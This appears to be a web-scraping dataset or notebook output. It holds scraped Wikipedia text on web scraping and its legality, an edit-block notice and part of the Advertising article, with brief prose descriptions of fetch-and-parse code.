318 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-6 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
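The scraped article in row 318 above describes web scraping as two steps, fetching a page and then extracting data from it, and names regular expressions and HTML parsing among the simplest techniques. The short sketch below illustrates that fetch-then-extract workflow with requests and BeautifulSoup; the function name, the built-in html.parser, and the whitespace-collapsing regex are illustrative choices, not part of the pipeline defined elsewhere in this notebook.

# Minimal fetch-then-extract sketch (illustrative only; assumes a static HTML page).
import re
import requests
from bs4 import BeautifulSoup

def fetch_and_extract(url):
    # Fetch: download the raw HTML, as a browser would when a user views the page.
    response = requests.get(url, timeout=10)
    response.raise_for_status()
    # Extract: parse the HTML into a tree and pull out the title and paragraph text.
    soup = BeautifulSoup(response.text, "html.parser")
    title = soup.title.get_text(strip=True) if soup.title else ""
    paragraphs = [p.get_text(" ", strip=True) for p in soup.find_all("p")]
    text = re.sub(r"\s+", " ", " ".join(paragraphs)).strip()
    return {"url": url, "title": title, "text": text}

# Example usage (hypothetical target):
# row = fetch_and_extract("https://en.wikipedia.org/wiki/Web_scraping")
# print(row["title"], len(row["text"]))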
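The same article also mentions parsing pages into a DOM tree and addressing parts of that tree with XPath. The sketch below shows that approach using lxml, an extra dependency assumed to be available here purely for illustration; the URL and the XPath expression are placeholders.

# DOM parsing with XPath; assumes the optional lxml package is installed (pip install lxml).
import requests
from lxml import html

def extract_hrefs(url):
    response = requests.get(url, timeout=10)
    response.raise_for_status()
    # Parse the HTML into a DOM tree that supports XPath queries.
    tree = html.fromstring(response.content)
    # XPath: every href attribute on anchor tags inside the page body.
    return tree.xpath("//body//a/@href")

# Example usage (hypothetical target):
# for href in extract_hrefs("https://example.com")[:10]:
#     print(href)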
319 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/w/index.php?title=Data_scraping&action=edit&section=2 | You do not have permission to edit this page: the IP range 180.190.0.0/16 has been blocked in response to abuse, and the block applies to editing on all Wikimedia wikis. Return to Data scraping. |
320 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Advertisement | Advertising is the practice and techniques employed to bring attention to a product or service. Advertising aims to present a product or service in terms of utility, advantages and qualities of interest to consumers. It is typically used to promote a specific good or service, but there are a wide range of uses, the most common being the commercial advertisement. Commercial advertisements often seek to generate increased consumption of their products or services through "branding", which associates a product name or image with certain qualities in the minds of consumers. On the other hand, ads that intend to elicit an immediate sale are known as direct-response advertising. Non-commercial entities that advertise more than consumer products or services include political parties, interest groups, religious organizations and governmental agencies. Non-profit organizations may use free modes of persuasion, such as a public service announcement. Advertising may also help to reassure employees or shareholders that a company is viable or successful. In the 19th century, soap businesses were among the first to employ large-scale advertising campaigns. Thomas J. Barratt was hired by Pears to be its brand manager—the first of its kind—and in addition to creating slogans and images he recruited West End stage actress and socialite Lillie Langtry to become the poster-girl for Pears, making her the first celebrity to endorse a commercial product. 1 Modern advertising originated with the techniques introduced with tobacco advertising in the 1920s, most significantly with the campaigns of Edward Bernays, considered the founder of modern, "Madison Avenue" advertising. 2 3 Worldwide spending on advertising in 2015 amounted to an estimated US$529.43 billion. 4 Advertising's projected distribution for 2017 was 40.4% on TV, 33.3% on digital, 9% on newspapers, 6.9% on magazines, 5.8% on outdoor and 4.3% on radio. 5 Internationally, the largest ("Big Five") advertising agency groups are Omnicom, WPP, Publicis, Interpublic, and Dentsu. 6 In Latin, advertere means "to turn towards". 7 Egyptians used papyrus to make sales messages and wall posters. 8 Commercial messages and political campaign displays have been found in the ruins of Pompeii and ancient Arabia. Lost and found advertising on papyrus was common in ancient Greece and ancient Rome. Wall or rock painting for commercial advertising is another manifestation of an ancient advertising form, which is present to this day in many parts of Asia, Africa, and South America. The tradition of wall painting can be traced back to Indian rock art paintings that date back to 4000 BC. 9 In ancient China, the earliest advertising known was oral, as recorded in the Classic of Poetry (11th to 7th centuries BC) of bamboo flutes played to sell confectionery. Advertisement usually takes in the form of calligraphic signboards and inked papers. A copper printing plate dated back to the Song dynasty used to print posters in the form of a square sheet of paper with a rabbit logo with "Jinan Liu's Fine Needle Shop" and "We buy high-quality steel rods and make fine-quality needles, to be ready for use at home in no time" written above and below 10 is considered the world's earliest identified printed advertising medium. 
11 In Europe, as the towns and cities of the Middle Ages began to grow, and the general population was unable to read, instead of signs that read "cobbler", "miller", "tailor", or "blacksmith", images associated with their trade would be used such as a boot, a suit, a hat, a clock, a diamond, a horseshoe, a candle or even a bag of flour. Fruits and vegetables were sold in the city square from the backs of carts and wagons and their proprietors used street callers (town criers) to announce their whereabouts. The first compilation of such advertisements was gathered in "Les Crieries de Paris", a thirteenth-century poem by Guillaume de la Villeneuve. 12 In the 18th century advertisements started to appear in weekly newspapers in England. These early print advertisements were used mainly to promote books and newspapers, which became increasingly affordable with advances in the printing press; and medicines, which were increasingly sought after. However, false advertising and so-called "quack" advertisements became a problem, which ushered in the regulation of advertising content. In the United States, newspapers grew quickly in the first few decades of the 19th century, in part due to advertising. By 1822, the United States had more newspaper readers than any other country. About half of the content of these newspapers consisted of advertising, usually local advertising, with half of the daily newspapers in the 1810s using the word "advertiser" in their name. 13 In August 1859, British pharmaceutical firm Beechams created a slogan for Beecham's Pills: "Beechams Pills: Worth a guinea a box", which is considered to be the world's first advertising slogan. 14 The Beechams adverts would appear in newspapers all over the world, helping the company become a global brand. 14 15 The phrase was said to be uttered by a satisfied lady purchaser from St Helens, Lancashire, the founder's home town. 16 In June 1836, French newspaper La Presse was the first to include paid advertising in its pages, citation needed allowing it to lower its price, extend its readership and increase its profitability and the formula was soon copied by all titles. Around 1840, Volney B. Palmer established the roots of the modern day advertising agency in Philadelphia. In 1842 Palmer bought large amounts of space in various newspapers at a discounted rate then resold the space at higher rates to advertisers. The actual ad the copy, layout, and artwork was still prepared by the company wishing to advertise; in effect, Palmer was a space broker. The situation changed when the first full-service advertising agency of N.W. Ayer Son was founded in 1869 in Philadelphia. Ayer Son offered to plan, create, and execute complete advertising campaigns for its customers. By 1900 the advertising agency had become the focal point of creative planning, and advertising was firmly established as a profession. 17 Around the same time, in France, Charles-Louis Havas extended the services of his news agency, Havas to include advertisement brokerage, making it the first French group to organize. At first, agencies were brokers for advertisement space in newspapers. 17 The late 19th and early 20th centuries saw the rise of modern advertising, driven by industrialization and the growth of consumer goods. This era saw the dawn of ad agencies, employing more cunning methods— persuasive diction and psychological tactics. 18 Thomas J. Barratt of London has been called "the father of modern advertising". 
19 20 21 Working for the Pears soap company, Barratt created an effective advertising campaign for the company products, which involved the use of targeted slogans, images and phrases. One of his slogans, "Good morning. Have you used Pears' soap? was famous in its day and into the 20th century. 22 23 In 1882, Barratt recruited English actress and socialite Lillie Langtry to become the poster-girl for Pears, making her the first celebrity to endorse a commercial product. 1 24 Becoming the company's brand manager in 1865, listed as the first of its kind by the Guinness Book of Records, Barratt introduced many of the crucial ideas that lie behind successful advertising and these were widely circulated in his day. He constantly stressed the importance of a strong and exclusive brand image for Pears and of emphasizing the product's availability through saturation campaigns. He also understood the importance of constantly reevaluating the market for changing tastes and mores, stating in 1907 that "tastes change, fashions change, and the advertiser has to change with them. An idea that was effective a generation ago would fall flat, stale, and unprofitable if presented to the public today. Not that the idea of today is always better than the older idea, but it is different it hits the present taste. 20 Enhanced advertising revenues was one effect of the Industrial Revolution in Britain. 25 Thanks to the revolution and the consumers it created, by the mid 19th century biscuits and chocolate became products for the masses, and British biscuit manufacturers were among the first to introduce branding to distinguish grocery products. 26 27 One the world's first global brands, Huntley Palmers biscuits were sold in 172 countries in 1900, and their global reach was reflected in their advertisements. 26 As a result of massive industrialization, advertising increased dramatically in the United States. In 1919 it was 2.5 percent of gross domestic product (GDP) in the US, and it averaged 2.2 percent of GDP between then and at least 2007, though it may have declined dramatically since the Great Recession. Industry could not benefit from its increased productivity without a substantial increase in consumer spending. This contributed to the development of mass marketing designed to influence the population's economic behavior on a larger scale. 29 In the 1910s and 1920s, advertisers in the U.S. adopted the doctrine that human instincts could be targeted and harnessed "sublimated" into the desire to purchase commodities. 30 Edward Bernays, a nephew of Sigmund Freud, became associated with the method and is sometimes called the founder of modern advertising and public relations. 31 Bernays claimed that: The general principle, that men are very largely actuated by motives which they conceal from themselves, is as true of mass as of individual psychology. It is evident that the successful propagandist must understand the true motives and not be content to accept the reasons which men give for what they do. 32 In other words, selling products by appealing to the rational minds of customers (the main method used prior to Bernays) was much less effective than selling products based on the unconscious desires that Bernays felt were the true motivators of human action. "Sex sells" became a controversial issue, with techniques for titillating and enlarging the audience posing a challenge to conventional morality. 33 34 In the 1920s, under Secretary of Commerce Herbert Hoover, the American government promoted advertising. 
Hoover himself delivered an address to the Associated Advertising Clubs of the World in 1925 called 'Advertising Is a Vital Force in Our National Life. 35 In October 1929, the head of the U.S. Bureau of Foreign and Domestic Commerce, Julius Klein, stated "Advertising is the key to world prosperity. 36 This was part of the "unparalleled" collaboration between business and government in the 1920s, according to a 1933 European economic journal. 37 The tobacco companies became major advertisers in order to sell packaged cigarettes. 38 The tobacco companies pioneered the new advertising techniques when they hired Bernays to create positive associations with tobacco smoking. 2 3 Advertising was also used as a vehicle for cultural assimilation, encouraging workers to exchange their traditional habits and community structure in favor of a shared "modern" lifestyle. 39 An important tool for influencing immigrant workers was the American Association of Foreign Language Newspapers (AAFLN). The AAFLN was primarily an advertising agency but also gained heavily centralized control over much of the immigrant press. 40 41 At the turn of the 20th century, advertising was one of the few career choices for women. Since women were responsible for most household purchasing done, advertisers and agencies recognized the value of women's insight during the creative process. In fact, the first American advertising to use a sexual sell was created by a woman for a soap product. Although tame by today's standards, the advertisement featured a couple with the message "A skin you love to touch". 42 In the 1920s, psychologists Walter D. Scott and John B. Watson contributed applied psychological theory to the field of advertising. Scott said, "Man has been called the reasoning animal but he could with greater truthfulness be called the creature of suggestion. He is reasonable, but he is to a greater extent suggestible". 43 He demonstrated this through his advertising technique of a direct command to the consumer. In the early 1920s, the first radio stations were established by radio equipment manufacturers, followed by non-profit organizations such as schools, clubs and civic groups who also set up their own stations. 44 Retailer and consumer goods manufacturers quickly recognized radio's potential to reach consumers in their home and soon adopted advertising techniques that would allow their messages to stand out; slogans, mascots, and jingles began to appear on radio in the 1920s and early television in the 1930s. 45 The rise of mass media communications allowed manufacturers of branded goods to bypass retailers by advertising directly to consumers. This was a major paradigm shift which forced manufacturers to focus on the brand and stimulated the need for superior insights into consumer purchasing, consumption and usage behavior; their needs, wants and aspirations. 46 The earliest radio drama series were sponsored by soap manufacturers and the genre became known as a soap opera. 47 Before long, radio station owners realized they could increase advertising revenue by selling 'air-time' in small time allocations which could be sold to multiple businesses. By the 1930s, these advertising spots, as the packets of time became known, were being sold by the station's geographical sales representatives, ushering in an era of national radio advertising. 
48 By the 1940s, manufacturers began to recognize the way in which consumers were developing personal relationships with their brands in a social psychological anthropological sense. 49 Advertisers began to use motivational research and consumer research to gather insights into consumer purchasing. Strong branded campaigns for Chrysler and Exxon Esso, using insights drawn research methods from psychology and cultural anthropology, led to some of the most enduring campaigns of the 20th century. 50 In the early 1950s, the DuMont Television Network began the modern practice of selling advertisement time to multiple sponsors. Previously, DuMont had trouble finding sponsors for many of their programs and compensated by selling smaller blocks of advertising time to several businesses. This eventually became the standard for the commercial television industry in the United States. However, it was still a common practice to have single sponsor shows, such as The United States Steel Hour. In some instances the sponsors exercised great control over the content of the show up to and including having one's advertising agency actually writing the show. 51 The single sponsor model is much less prevalent now, a notable exception being the Hallmark Hall of Fame. citation needed 52 The late 1980s and early 1990s saw the introduction of cable television and particularly MTV. Pioneering the concept of the music video, MTV ushered in a new type of advertising: the consumer tunes in for the advertising message, rather than it being a by-product or afterthought. As cable and satellite television became increasingly prevalent, specialty channels emerged, including channels entirely devoted to advertising, such as QVC, Home Shopping Network, and ShopTV Canada. 53 With the advent of the ad server, online advertising grew, contributing to the "dot-com" boom of the 1990s. 54 Entire corporations operated solely on advertising revenue, offering everything from coupons to free Internet access. At the turn of the 21st century, some websites, including the search engine Google, changed online advertising by personalizing ads based on web browsing behavior. This has led to other similar efforts and an increase in interactive advertising. 55 Online advertising introduced new opportunities for targeting and engagement, with platforms like Google and Facebook leading the charge. This shift has significantly altered the advertising landscape, making digital advertising a dominant force in the industry. 56 The share of advertising spending relative to GDP has changed little across large changes in media since 1925. In 1925, the main advertising media in America were newspapers, magazines, signs on streetcars, and outdoor posters. Advertising spending as a share of GDP was about 2.9 percent. By 1998, television and radio had become major advertising media; by 2017, the balance between broadcast and online advertising had shifted, with online spending exceeding broadcast. 57 Nonetheless, advertising spending as a share of GDP was slightly lower about 2.4 percent. 58 Guerrilla marketing involves unusual approaches such as staged encounters in public places, giveaways of products such as cars that are covered with brand messages, and interactive advertising where the viewer can respond to become part of the advertising message. This type of advertising is unpredictable, which causes consumers to buy the product or idea. 
59 This reflects an increasing trend of interactive and "embedded" ads, such as via product placement, having consumers vote through text messages, and various campaigns utilizing social network services such as Facebook or Twitter. 60 The advertising business model has also been adapted in recent years. when? clarification needed In media for equity, advertising is not sold, but provided to start-up companies in return for equity. If the company grows and is sold, the media companies receive cash for their shares. Domain name registrants (usually those who register and renew domains as an investment) sometimes "park" their domains and allow advertising companies to place ads on their sites in return for per-click payments. These ads are typically driven by pay per click search engines like Google or Yahoo, but ads can sometimes be placed directly on targeted domain names through a domain lease or by making contact with the registrant of a domain name that describes a product. Domain name registrants are generally easy to identify through WHOIS records that are publicly available at registrar websites. 61 Advertising may be categorized in a variety of ways, including by style, target audience, geographic scope, medium, or purpose. 62 : 9 15 For example, in print advertising, classification by style can include display advertising (ads with design elements sold by size) vs. classified advertising (ads without design elements sold by the word or line). Advertising may be local, national or global. An ad campaign may be directed toward consumers or to businesses. The purpose of an ad may be to raise awareness (brand advertising), or to elicit an immediate sale (direct response advertising). The term above the line (ATL) is used for advertising involving mass media; more targeted forms of advertising and promotion are referred to as below the line (BTL). 63 64 The two terms date back to 1954 when Procter Gamble began paying their advertising agencies differently from other promotional agencies. 65 In the 2010s, as advertising technology developed, a new term, through the line (TTL) began to come into use, referring to integrated advertising campaigns. 66 67 Virtually any medium can be used for advertising. Commercial advertising media can include wall paintings, billboards, street furniture components, printed flyers and rack cards, radio, cinema and television adverts, web banners, mobile telephone screens, shopping carts, web popups, skywriting, bus stop benches, human billboards and forehead advertising, magazines, newspapers, town criers, sides of buses, banners attached to or sides of airplanes ("logojets"), in-flight advertisements on seatback tray tables or overhead storage bins, taxicab doors, roof mounts and passenger screens, musical stage shows, subway platforms and trains, elastic bands on disposable diapers, doors of bathroom stalls, stickers on apples in supermarkets, shopping cart handles (grabertising), the opening section of streaming audio and video, posters, and the backs of event tickets and supermarket receipts. Any situation in which an "identified" sponsor pays to deliver their message through a medium is advertising. 68 A new advertising approach is known as advanced advertising, which is data-driven advertising, using large quantities of data, precise measuring tools and precise targeting. 86 Advanced advertising also makes it easier for companies which sell ad-space to attribute customer purchases to the ads they display or broadcast. 
87 Increasingly, other media are overtaking many of the "traditional" media such as television, radio and newspaper because of a shift toward the usage of the Internet for news and music as well as devices like digital video recorders (DVRs) such as TiVo. 88 Online advertising began with unsolicited bulk e-mail advertising known as "e-mail spam". Spam has been a problem for e-mail users since 1978. 89 As new online communication channels became available, advertising followed. The first banner ad appeared on the World Wide Web in 1994. 90 Prices of Web-based advertising space are dependent on the "relevance" of the surrounding web content and the traffic that the website receives. citation needed In online display advertising, display ads generate awareness quickly. Unlike search, which requires someone to be aware of a need, display advertising can drive awareness of something new and without previous knowledge. Display works well for direct response. Display is not only used for generating awareness, it is used for direct response campaigns that link to a landing page with a clear 'call to action'. citation needed As the mobile phone became a new mass medium in 1998 when the first paid downloadable content appeared on mobile phones in Finland, 91 citation needed mobile advertising followed, also first launched in Finland in 2000. citation needed By 2007 the value of mobile advertising had reached $2 billion and providers such as Admob delivered billions of mobile ads. citation needed More advanced mobile ads include banner ads, coupons, Multimedia Messaging Service picture and video messages, advergames and various engagement marketing campaigns. A particular feature driving mobile ads is the 2D barcode, which replaces the need to do any typing of web addresses, and uses the camera feature of modern phones to gain immediate access to web content. 83 percent of Japanese mobile phone users already are active users of 2D barcodes. 92 Some companies have proposed placing messages or corporate logos on the side of booster rockets and the International Space Station. 93 Unpaid advertising (also called "publicity advertising"), can include personal recommendations ("bring a friend", "sell it"), spreading buzz, or achieving the feat of equating a brand with a common noun (in the United States, "Xerox" "photocopier", "Kleenex" tissue, "Vaseline" petroleum jelly, "Hoover" vacuum cleaner, and "Band-Aid" adhesive bandage). However, some companies which? oppose the use of their brand name to label an object. Equating a brand with a common noun also risks turning that brand into a generic trademark turning it into a generic term which means that its legal protection as a trademark is lost. 94 disputed discuss Early in its life, The CW aired short programming breaks called "Content Wraps", to advertise one company's product during an entire commercial break. The CW pioneered "content wraps" and some products featured were Herbal Essences, Crest, Guitar Hero II, CoverGirl, and Toyota. 95 96 A new promotion concept has appeared, "ARvertising", advertising on augmented reality technology. 97 Controversy exists on the effectiveness of subliminal advertising (see mind control), and the pervasiveness of mass messages (propaganda). With the Internet came many new advertising opportunities. Pop-up, Flash, banner, pop-under, advergaming, and email advertisements (all of which are often unwanted or spam in the case of email) are now commonplace. 
Particularly since the rise of "entertaining" advertising, some people may like an advertisement enough to wish to watch it later or show a friend. citation needed In general, the advertising community has not yet made this easy, although some have used the Internet to widely distribute their ads to anyone willing to see or hear them. In the last three quarters of 2009, mobile and Internet advertising grew by 18% and 9% respectively, while older media advertising saw declines: 10.1% (TV), 11.7% (radio), 14.8% (magazines) and 18.7% (newspapers). citation needed Between 2008 and 2014, U.S. newspapers lost more than half their print advertising revenue. 99 Another significant trend regarding future of advertising is the growing importance of the niche market using niche or targeted ads. Also brought about by the Internet and the theory of the long tail, advertisers will have an increasing ability to reach specific audiences. In the past, the most efficient way to deliver a message was to blanket the largest mass market audience possible. citation needed However, usage tracking, customer profiles and the growing popularity of niche content brought about by everything from blogs to social networking sites, provide advertisers with audiences that are smaller but much better defined, citation needed leading to ads that are more relevant to viewers and more effective for companies' marketing products. Among others, Comcast Spotlight is one such advertiser employing this method in their video on demand menus. These advertisements are targeted to a specific group and can be viewed by anyone wishing to find out more about a particular business or practice, from their home. This causes the viewer to become proactive and actually choose what advertisements they want to view. 100 Niche marketing could also be helped by bringing the issue of color into advertisements. Different colors play major roles when it comes to marketing strategies, for example, seeing the blue can promote a sense of calmness and gives a sense of security which is why many social networks such as Facebook use blue in their logos. Google AdSense is an example of niche marketing. Google calculates the primary purpose of a website and adjusts ads accordingly; it uses keywords on the page (or even in emails) to find the general ideas of topics disused and places ads that will most likely be clicked on by viewers of the email account or website visitors. The concept of crowdsourcing has given way to the trend of user-generated advertisements. User-generated ads are created by 